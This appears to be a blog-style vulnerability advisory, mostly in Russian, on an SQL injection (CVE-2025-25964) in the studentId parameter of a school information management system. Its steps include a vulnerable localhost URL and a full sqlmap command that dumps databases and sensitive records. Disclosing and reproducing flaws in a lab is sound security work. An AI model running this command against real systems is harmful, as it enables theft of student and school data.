
A critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0
В современном цифровом мире SQL-инъекция (SQLi) остается одной из самых распространенных и опасных уязвимостей, встречающихся в веб-приложениях. В этой статье блога рассматривается критическая уязвимость SQL-инъекции (CVE-2025-25964), обнаруженная в School Information Management System v1.0, разработанной Itsourcecode. Эта уязвимость позволяет удаленным злоумышленникам эксплуатировать систему, что может привести к раскрытию конфиденциальной информации.
Идентификатор CVE: CVE-2025-25964
Тип уязвимости: SQL Injection (SQLi)
Затронутый продукт: Student Information Management System - v1.0
Затронутый компонент: параметр studentId в /columbans/admin/modules/student/index.php
Тип атаки: Удаленная
Серьезность: Высокая
Обнаружил: Sakib Shaikh
Чтобы продемонстрировать воздействие, выполните следующие пошаговые инструкции:
Установите уязвимое приложение: Установите и настройте School Information Management System v1.0 на локальном сервере.
Войдите в систему: Войдите, используя предоставленные Itsourcecode учетные данные.
Получите доступ к уязвимой конечной точке:
http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207
Наблюдайте за ответом приложения: Если страница загружается более 10 секунд, SQL-инъекция подтверждена. Это доказывает, что серверная база данных выполняет внедренный SQL-запрос.
Используйте SQLMap для автоматизированной эксплуатации:
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast
Эта команда пытается извлечь имена баз данных, таблицы и конфиденциальную информацию из системы.
Проблема возникает из-за неправильной санитизации входных данных в параметре studentId файла index.php. Когда злоумышленник изменяет параметр studentId, добавляя вредоносные SQL-полезные нагрузки, приложение обрабатывает ввод без надлежащей проверки, что приводит к SQL-инъекции.